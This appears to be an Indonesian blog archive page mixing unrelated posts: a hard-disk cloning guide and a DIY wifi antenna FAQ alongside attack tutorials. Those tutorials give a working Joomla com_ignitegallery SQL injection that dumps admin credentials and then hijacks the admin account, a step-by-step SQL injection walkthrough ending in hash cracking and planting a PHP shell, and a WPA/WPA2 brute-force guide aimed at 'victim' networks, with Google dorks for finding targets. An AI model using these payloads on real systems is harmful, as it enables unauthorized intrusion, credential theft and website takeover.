New Post

Archive

TUTORIAL EXPLOIT JOMLA

hack jomla
- Step 1 
"Exploit Joomla option=com_ignitegallery"
sedikit dr awamer
 "Exploit Joomla option=com_ignitegallery"
no picture.. sorry
--first  coba kita cari di google dengan dork ini
inurl:"index.php option=com_ignitegallery"
kembangin sdnri ya

- Step 2
pasang exploitnya
exploit : /index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4,5,6,7,8,9,10+from+jos_users--

 contoh : http://www.pulot.com/index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat%28id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype%29,4,5,6,7,8,9,10+from+jos_users-

- ntar muncul tu 62:admini:989868wjhgd blablabla..

 - second coba kita reset password nyasekarang kita reset password dengan menggunakan exploit ini :

www.site.com/index.php?option=com_user&view=reset  
masukin aja email admin tadi..

- third wah minta activation pula, tenang kita cari dulu activationnya :D
exploit :

 index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,activation),4,5,6,7,8,9,10+from+jos_users-- ntar keluar aktifasi nya..


NOTE: klo aktifasi nya ada code tanda $.. berarti code aktifasi nya g bisa pke, find target lain trus masukin code aktifasi nya..


trus dia nya minta password baru.. masukin password sesuka kamu.

oke langsung ke tahap berikutnya,
sekarang kita masuk keadminnya
http://site.com/administrator/

ANTENA WIFI RAKITAN

cara merakit antena wifiSebaiknya Anda pertimbangkan untuk membuat Wajan Bolic. Kenapa? Karena Wajan Bolic lebih murah daripada Antena Kaleng berdasarkan dari uji coba yang saya lakukan.


1. USB Wifi Blue Link BL U80G = Rp. 130.000

2. Wajan 38cm = Rp 27.500

3. 1 Meter PVC 3" = Rp. 12.500

4. 2 Doff (tutup pralon) = Rp. 10.000

5. 1 buah Baut = Rp. 6000

6. 1 Gulung Kertas Alumunium = Rp. 33.000

7. 8 M kabel belden 1538 A = 32.000

8. 1 buah USB Extender = Rp. 10.000


Bagaimana dengan biaya antena kaleng? Tahun 2006 saya menghabiskan biaya lebih dari 400 ribu untuk pembuatan antenna kaleng, tapi untuk sekarang mungkin sudah lebih murah dan ada juga komponen yang makin naik harganya. Seperti komentar berikut:

Di panduan yang Bapak buat, harga SMA Connectornya Rp 11.000,- tapi setelah saya ke toko Sagan Baru, saya tanya harganya Rp 32.000,- Lalu, harga Soket N Connector dan Plugnya dua kali lipat lebih mahal dari panduan yang Bapak buat. Gimana dong, Pak? Apa memang harganya udah segitu?

dan

saya sudah buat antena kaleng, ternyata biaya untuk beli alat konektor nya 155.000 beda jauh sama yang di gambar. trus setelah di coba. tetap gak bisa konek internet.

Karena antusiasnya pengguna internet Indonesia untuk mendapatkan koneksi internet dengan harga murah atau gratis, sekaligus tidak ingin mengecewakan pembaca, Berikut pertanyaan yang sering ditanyakan dan diulang-ulang (maklum orang Indonesia banyak yang malas membaca).



T: Dimanakah saya bisa men-download e-book antena kaleng?

J: Silakan download disini. Sudah lengkap dengan gambarnya dan antena calculator.



T: Apakah Anda sudah mencoba mempraktekannya (membuat antenna kaleng)?

J: Tentunya sudah, dan saya pergunakan hingga kalengnya berkarat .



T: Berapa jarak maksimal antenna kaleng ke Access Point atau sebaliknya? Apa ada hubungannya dengan ketinggian antena.

J: Jarak maksimal hanya 1 km, dan pernah saya coba sejauh kurang lebih 700 meter, dan hubungannya dengan ketinggian, semakin tinggi Antena maka semakin tinggi pula peluang untuk mendapatkan sinyal Wi-Fi



T: Berapa maksimal panjang kabel RG 58?

J: Panjang maksimal 7 meter jika lebih dari itu maka koneksi tidak akan berjalan dengan baik. Idealnya 50 cm.



T: Apa tembaga buat antena bisa diambil dari kabel tembaga biasa?

J: Bisa. Saya memakai tembaga dari kabel listrik.



T: Apakah antena kaleng bisa langsung konek ke hotspot? Apa perlu software?

J: Bisa, jika hotspot-nya memang diperuntukan untuk umum, dan untuk terhubung tidak perlu software tambahan, karena di Windows atau Linux sudah ada. Silakan baca cara terhubung ke Wi-Fi di e-booknya.



T: Aku coba pakai antena kaleng sudah dapat sinyal Wi-Fi cuma 1 baris tapi tidak bisa konek? padahal aku tanya hotspotnya dibuka untuk umum, apa perlu seting lagi di windows?

J: Satu baris artinya sinyal sangat lemah dan kemungkinan untuk terhubung sangat sulit. Pastikan juga Wireless Zero Configuration-nya sudah jalan (Baca di e-book, sudah ada penjelasannya). Tanyakan juga kepada pemilik Wi-Fi, bentuk umumnya seperti apa? Ada juga yang di bebaskan untuk umum tapi kita harus mendaftar.



T: Nah apa gak perlu account/user/password tuk konek ke akses poin yang bakal menjadi sasaran?

J: Tergantung dari settingan Akses Point.



T: Laptop kan udah ada wifinya tanpa menggunakan modem, bagaimana cara memperkuat penerima wifi yang udah ada di dalam laptop? apa masih pakek tambahan modem?

J: Kalau yang ini belum tahu caranya, karena Wi-Fi sudah terpasang di laptop atau built in, dan yang jelas tidak perlu tambahan modem.



T: Mas, ada gak cara bikin antenna 2.4 GHz dengan memanfaatkan Wireless adapter internal pada notebook, tolong donk!!!

J: Maaf, Sejauh ini saya belum menemukan tutorial cara memanfaatkan atau memperkuat sinyal dari Wireless adapter internal laptop.



T: Pada no 2 tentang alat yang di perlukan dituliskan tentang PCMCIA Card ( bila anda menggunakan laptop yang belum di lengkapi perangkat wifi 802,11b atau 802,11g) yang mempunyai antena luar.

1. Apa maksudnya itu mas?

2. Apa laptop saya punya hal itu? (laptop saya punya fasilitas wifi yang bisa konek langsung kalau ada hotspot terbuka)

3. Apabila laptop saya mempunyai fasilitas wifi tersbut, apakah masih di perlukan juga PCMCIA untuk pembuatan antena kaleng ini? (mksud saya, apakah kabel RG 58 yang dari antena tetap di sambungkan juga ke PCMCIA card? )

J: Berikut jawaban dari tiga pertanyaan yang paling sering ditanyakan.

1. Maksudnya jika laptop belum ada Wi-Fi internal atau bawaan, maka harus dibelikan untuk PCMCIA atau USB Wifi untuk dapat terkoneksi internet.

2. Karena laptop sudah terhubung ke hotspot, artinya laptop sudah ada Wifi internal tapi tidak bisa dipakai untuk antena kaleng.

3. Masih perlu. Tidak perlu beli PCMCIA dan kabel RG 58, karena sekarang sudah ada wajan bolic yang menggunakan USB Wifi yang harganya lebih murah dari PCMCIA.



T: Om... Kalau pake wifi adpater bawaan laptop bisa gak? Terus nyolokin kabel antena ke laptop dimananya?

J: Belum bisa. Karena Wi-Fi adapter bawaan, maka tidak ada tempat untuk nyolokin kabel.



T: Mas penulis... Sekarang kayaknya susah nyari Wireless Lan Card. Kalo pake USB wireless bisa ga?

J: Bisa. Perhitungan yang digunakan juga sama... Silakan di coba. Untuk memperpanjang kabelnya silakan gunakan UTP + USB Extender (untuk caranya, silakan baca sampai habis tulisan ini).



T. Saya tidak menggunakan PCI WLAN card, tapi mengunakan USB WLAN bisa ga? trus klo seandainya bisa, langkah-langkah apa saja yang perlu saya lakukan nanti untuk bisa merubah USB WLAN saya menjadi Antena luar, karena saat ini saya sudah punya USB WLAN, kan sayang klo saya harus beli PCI WLAN.

J: Bisa.Langkah-langkahya sama dengan jawaban diatas.



T: Apakah antena kaleng ini legal?

J: Legal, kecuali sudah ada hukumnya. Maaf, belum pernah baca larangannya.



T: Bagaimana kita mengetahui suatu area atau daerah ada hotspotnya?

J: Untuk mengetahui hotspot disekitar gunakan netbook, laptop, HP atau BB yang sudah ada WiFi-nya. Untuk memudahkan dalam melacak keberadaan sinyal, install netstumbler,insider atau vistumbler. Metode pencarian ini dikenal dengan istilah War Driving



T: Bagaimana kalau setiap peralatan yang dibutuhkan untuk membuat antena kaleng disertkan gambarnya, supaya kalau kita nanya ke tokonya jadi lebih gampang.

J: Gambarnya sudah ada didalam e-books. Silakan di download e-booknya dan dibaca lebih teliti.



T: Apakah antena kaleng tahan dari hujan? Bagaimana supaya tahan hujan? Apakah hujan mengganggu sinyalnya?

J: Tergantung dari bahan antena. Kaleng mudah karatan (korosi) dan untuk membuatnya tahan hujan bisa dibuatkan penutup diatasnya, tapi ini tidak perlu dilakukan karena kaleng bisa kita ganti setiap saat dan murah. Tentu saja hujan dapat mengganggu sinyal dan membuat koneksi jadi lambat.



T: Apakah wireless hack melanggar hukum?

J: Hacking jika tujuan untuk testing keamanan system dari Wi-Fi dan diberikan ijin tentunya tidak melanggar hukum, tapi jika hacking yang dimaksudkan adalah untuk mendapatkan akses internet dari Wi-Fi yang kita hack tentunya sama dengan mencuri. Untuk hukumannya saya belum tahu.



T: Saya udah buat antena kaleng, dan sudah dapet sinyalnya, terus bagaimana caranya agar saya bisa terhubung ke internet?

J: Caranya, pastikan terlebih dahulu bahwa sinyal yang ada tidak di proteksi (ada gambar gembok) dan bisa di akses oleh umum. Caranya baca di e-book.



T: Daerah mana saja yang bisa memakai antena kaleng?

J: Semua daerah yang ada sinyal Wi-Fi.



T. bagaimana cara penyambungan kabel UTP dan USB extender?

J: Berikut adalah penyambungan atau rangkaian kabel UTP dengan USB:

putih oranye dan oranye (UTP) = (USB) merah

putih hijau (UTP) = (USB) putih

hijau (UTP) = (USB) hijau

putih biru, biru, putih coklat, coklat (UTP) = (USB) hitam

Info lengkapnya: Teknik USB Extender



T: Berapa maksimal panjang UTP untuk memperpanjang USB Extender?

J: 5 meter untuk kualitas yang bagus. 8 meter sudah mencukupi dengan kabel yang baik (Belden AMERIKA). Jika lebih dari 8 meter, Anda harus menggunakan USB Power Injector.





HACKING WIFI

cara hack speedy password
tutor kali ini akan membahas cara hack password wpa/wpa2 pada area hospot yang terkunci security wpa2
dengan tool airlin kita bisa bruteforce security wifi tanpa wpa handshake
langsung saja
download toolnya --> Disini
taruh hasil download pada desktop lalu ekstrak dengan perintah
unrar x /root/Desktop/airlin-1-0-1.rar
setelah itu masuk folder airlin

cd Desktop/airlin-1-0-1
chmod 777 airlin.sh
mv airlin.sh /usr/bin/airlin.sh

setelah ailin dipindah folder ke /usr/bin lalu keluar dan buka terminal lagi
dan jalankan program airlin.sh

pilih interface kalian disini saya menggunakan wlan0
Lalu cari korban wifi yang terproteksi wpa/wpa2
aktifkan airmon-ng dan scan dan scan dengan airodump-ng dengan membuka tab baru dengan menekan ctrl + shift + t
lalu copy paste essid wifi tersebut
lalu pilih wordlist kalian
disini wordlist saya ada pada /root/Desktop/contoh.txt
lalu isi kan delay nya
jangan terlalu cepat delaynya itu berakibat airlin gak bisa membruteforce dengan akurat

disini saya memilih delay 25
ok tunggu hingga proses brute selesai

dan password pun di temukan

Cara Cloning Hardisk Mudah dan Cepat dengan XXClone Gratis

cara clonning hardiskSebuah pertanyaan yang tepat diajukan sebelum saya melanjutkan artikel ini adalah : kenapa kita perlu cloning hardisk? Apa manfaat dan keuntungannya? Studi kasus berikut ini mungkin bisa menjelaskan tentang manfaat yang kita dapatkan dari kloning hardisk :

Hardisk komputer kita berkapasitas kecil. Kita ingin upgrade ke hardisk yang berkapasitas lebih besar. Sayangnya, di dalam hardisk tersebut sudah terinstall Windows, software, aplikasi, dan banyak hal lainnya. Akan sangat melelahkan dan boros waktu jika kita menginstall semuanya dari awal. Hal yang bisa kita lakukan untuk menghemat waktu dan produktivitas adalah dengan mengkloning hardisk lama kita ke hardisk kita yang baru. File, Windows, Software, Aplikasi, serta berbagai setting lainnya akan bisa digunakan secara langsung tanpa kita perlu bersusah payah.

Dengan manfaat cloning hdd yang sedemikian besar, hari ini saya akan memberikan sebuah software clone hardisk yang gratis dan legal : XXClone!

Apa itu XXClone?

XXClone adalah freeware yang dibuat untuk mempermudah anda dalam melakukan kloning hardisk. Fungsinya sama dengan software Norton Ghost.

Sebenarnya XXClone Free merupakan versi gratis dari XXClone Home dan XXClone Pro. Namun demikian, fitur XXClone Free sudah bisa digunakan untuk mengkloning hardisk dengan mudah dan cepat.

Bagaimana cara mengkloning hardisk dengan XXClone Free?

1. Download XXClone Free versi terbaru

Installer XXClone Free disini http://www.xxclone.com/xxclone.zip

Homepage XXClone Free disini http://www.xxclone.com/

2. Install dan jalankan XXClone Free

3. Pastikan kedua hardisk : hardisk sumber (source) dan hardisk tujuan (target) sudah terpasang di komputer anda.

3. Ketika pertama kali XXClone dijalankan, akan ada tampilan untuk memilih Source Volume dan Target Volume. Pilih sesuai dengan yang anda inginkan kemudian klik “Start”. Klik Yes jika ada popup konfirmasi. Tunggu hingga selesai.

4. Jika dalam kasus ini anda sedang mengkloning hardisk yang berisi sistem operasi, maka anda harus membuat Clone Drive tersebut bootable. Caranya cukup klik tab “Cool Tools” dan klik tombol “Make Bootable”

5. Saat ada popup yang muncul, centang ketiga Boot Control : Write MBR, Write Boot Sector, dan Write BOOT.INI. Kemudian klik Start. Saat ada konfirmasi, klik Yes.

6. Hardisk anda sudah selesai dikloning, Klik Exit.

CARA MELAKUKAN SQL INJECTION


TRIKMELAKUKAN SQL INJECTION
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
Yang perlu di ketahui sebelum sql injection pada mysql :
karakter: ' atau –
comments: /* atau –
information_schema untuk versi: mysql versi 5.x
( tidak support untuk mysql versi 4.x )

      Cari Target + Bugnya
Cara mencarinya adalah dengan dork sql injection. Misalnya inurl:index.php?id=” search dengan om GOOGLE, misalkan kita mendapatkan alamat situs

http://www.target.com/index.php?id=4

Lalu untuk mengetahui suatu web memiliki bug SQL injection, tambahkan sebuah tanda petik pada akhir url, sehingga urlnya menjadi

http://www.target.com/index.php?id=4

lalu tekan enter dan apa yang terjadi pada situs tersebut? Situsnya menampilkan pesan error, berarti parameter id tidak di filter dengan baik atau bahkan tidak difilter sama sekali. Untuk mengetahui suatu web aplikasi memiliki bug SQL Injection salah satunya adalah menggunakan perintah and+1=1--
Ketika di tambahkan parameter +and+1=1-- pada akhir URL, situsnya tampil dengan normal karena 1=1 menghasilkan nilai true.

http://www.target.com/index.php?id=4+and+1=1--


Dan ketika di tambahkan parameter +and+1=2-- isi berita tidak dapat ditampilkan karena 1=2 hasilnya false dan ini membuktikan bahwa web aplikasi tersebut  99.9% memiliki bug SQL Injection

http://www.target.com/index.php?id=4+and+1=2--

     Cari Column Yang Memiliki Celah Injection
Setelah saya tau bahwa web tersebut memiliki Bug SQL Injection saya harus mencari tau nama table dan column, tapi sebelum itu saya harus mencari tau pada column ke berapa saya bisa melakukan Injection, untuk itu saya menggunakan perintah +order+by+ perhatikan url berikut.

http://www.target.com/index.php?id=4+order+by+1--
http://www.target.com/index.php?id=4+order+by+2--
http://www.target.com/index.php?id=4+order+by+3--
http://www.target.com/index.php?id=4+order+by+4--
http://www.target.com/index.php?id=4+order+by+5--


url diatas jika di coba satu persatu akan menampilkan situsnya secara normal. Tapi ketika saya menginputnya dengan order+by+6-- apa yang terjadi??? Browser menampilkan pesan error. Dari pesan error tersebut bisa dipastikan terdapat 5 buah column yang terdapat disalah satu table yang belum kita ketahui namanya. Berarti yang kita ambil sampai +order+by+5-- saja.

     Gunakan Perintah Union Select
Setelah saya mengetahui terdapat 5 buah column pada target, selanjutnya yaitu mencari column yang bisa dilakukan injeksi. Untuk itu saya menggunakan perintah +union+select+ (pakai union all select juga bisa koq) sehingga urlnya menjadi :

http://www.target.com/index.php?id=4+union+select+1,2,3,4,5--

Dan apa yang tampak di browser tidak ada yang aneh bukan? situsnya tampil dengan normal. Tetapi jika parameter id saya ganti menjadi -4 yang pastinya tidak ada isi data -4 di Database.

http://www.target.com/index.php?id=-4+union+select+1,2,3,4,5--

Oke disini browser menampilkan angka 2 & 3, dan angka inilah yang sering disebut dengan angka ajaib, karena angka tersebut adalah letak column dimana attacker bisa melakukan injeksi lebih lanjut.

     Cari informasi Database Target
Dengan tampilnya angka ajaib tersebut anda bisa 'mengintip' beberapa informasi seperti nama database, nama user database, versi database, sessi user dll. Untuk melihat nama database, injeksi urlnya menjadi
http://www.target.com/index.php?id=-4+union+select+1,database(),3,4,5--

Dan disini browser menampilkan nama database yaitu xyb_injector. Saya mencoba mengintip lagi nama user database pada situs tersebut dengan menginjeksinya pada column ke-2 dan versi pada column ke-3 dan url injeksinya menjadi :

http://www.target.com/index.php?id=-4+union+select+1,user(),version(),4,5--

Ternyata user dabasenya root@localhost dan beruntung sekali karena versi mysql yang di gunakan adalah versi 5.0.51a-community, lho emang kenapa kalo versi 5??? Karena bisa dilanjutin bacanya :D, kalo misalkan versi 4 tinggalin aja deh, cari target baru, hahahaha ?.

Coba anda perhatikan, anda hanya bisa meng-injeksi satu perintah pada satu column. Bisakah meng-injeksi lebih dari satu perintah pada satu colums??? Heheheh tentu saja bisa dong, untuk itu anda bisa menggunakan perintah yang sudah disediakan langsung oleh mysql yaitu perintah concat(perintah1,perintah2). Contoh dibawah ini saya meng-intip nama user dan nama database pada column ke-2 dan pada column ke-3 saya mengintip versi databasenya.

http://www.target.com/index.php?id=4+union+select+1,concat(user(),0x3a,database()),version(),4,5--

     Dapatkan Nama Table
Saya sudah mendapatkan informasi database web tersebut, sebenarnya yang saya butuhkan hanyalah versi databasenya saja, seperti yang sudah anda lihat, versi database yang ditampilkan adalah 5.0.51a-community dan tentu ini memudahkan saya dalam mendapatkan table dengan menggunakan perintah table_name pada column yang memiliki bug yaitu angka 2 atau 3 pada web tersebut. Di akhir statement tambahkan from+information_schema.tables+where+table_schema=database()+limit+0,1--

Sehingga urlnya menjadi :

http://www.target.com/index.php?id=4+union+select+1,2,table_name,4,5+from+information_schema.tables+where+table_schema=database()+limit+0,1--


Di web tersebut tampil sebuah table bernama "table_attacker". Untuk melihat seluruh table sekaligus gunakan perintah group_concat(table_name) pada column yang memiliki bug, sehingga urlnya menjadi

http://www.target.com/index.php?id=4+union+select+1,2,group_concat(table_name),4,5+from+information_schema.tables+where+table_schema=database()--

Hihihi sip, seluruh table berhasil saya dapatkan, diantara table tersebut, table manakah yang harus saya telusuri lebih jauh lagi??? table_user sepertinya menarik :P yuk kita lihat apa isinya.

Dapatkan Nama Column
table_user sudah saya dapatkan selanjutnya yaitu mencari nama column pada table tersebut, untuk itu saya menggunakan perintah group_concat(column_name) sehingga urlnya menjadi

http://www.target.com/index.php?id=4+union+select+1,2,group_concat(column_name),4,5+from+information_schema.columns+where+table_name=0xhexa--


pada tahap ini kamu wajib mengextrak kata yang keluar pada isi table tadi menjadi hexadecimal yaitu dengan cara mengkonversinya. Salah satu website yg digunakan untuk konversi :
http://www.string-functions.com/string-hex.aspx


Contoh kata yg ingin di konversi yaitu table_user maka akan menjadi 7461626c655f75736572 ini masih belum selesai, anda harus menambahkan angka 0 dan huruf x pada awal hasil hexa tersebut sehingga hasilnya menjadi 0x7461626c655f75736572 dan inilah yang akan kita injeksikan pada nama tabel. Sehingga urlnya menjadi

http://www.target.com/index.php?id=4+union+select+1,2,group_concat(column_name),4,5+from+information_schema.columns+where+table_name=0x7461626c655f75736572--
< 

Alhasil nama column dari table_user sudah saya dapatkan yaitu user_id dan password_id.

     Dapatkan Usename & Password
Saya sudah mendapatkan nama table “table_user” yang berisi 2 buah column yaitu user_id” dan “password_id” dan akhirnya anda sudah sampai di detik-detik terakhir yaitu menampilkan isi data dari column tersebut. Tambahkan 0x3a pada group_concat(hasil isi column yg mau dikeluarkan,0x3a, hasil isi column yg mau dikeluarkan) perintah +from+(nama table berasal) à dimasukkan setelah angka terakhir sehingga urlnya menjadi :
http://www.target.com/index.php?id=4+union+select+1,2,group_concat(user_id,0x3a,password_id),4,5+from+table_user--

Tampil
lah seluruh username dan password dari situs tersebut. Biasanya password yang kita dapat sudah terenkripsi dalam bentuk md5 atau enkripsi yang lainnya. Untuk menterjemahkannya anda bisa mencari website yang menyediakan cracking password atau dengan tool cracking password. Setelah itu anda tinggal mencari halaman log in admin dan masuki sistemnya. Setelah memasuki sistem biasanya hacker menanamkan php shell untuk lebih gampang keluar masuk dan bisa mengexplore isi dari website tersebut terlebih lagi si hacker bisa melakukan teknik jumping sehingga semua website yang berada dalam 1 server yang sama dengan website yang terkena hack tersebut bisa di ambil alih oleh hacker tersebut, berbahaya sekali bukan?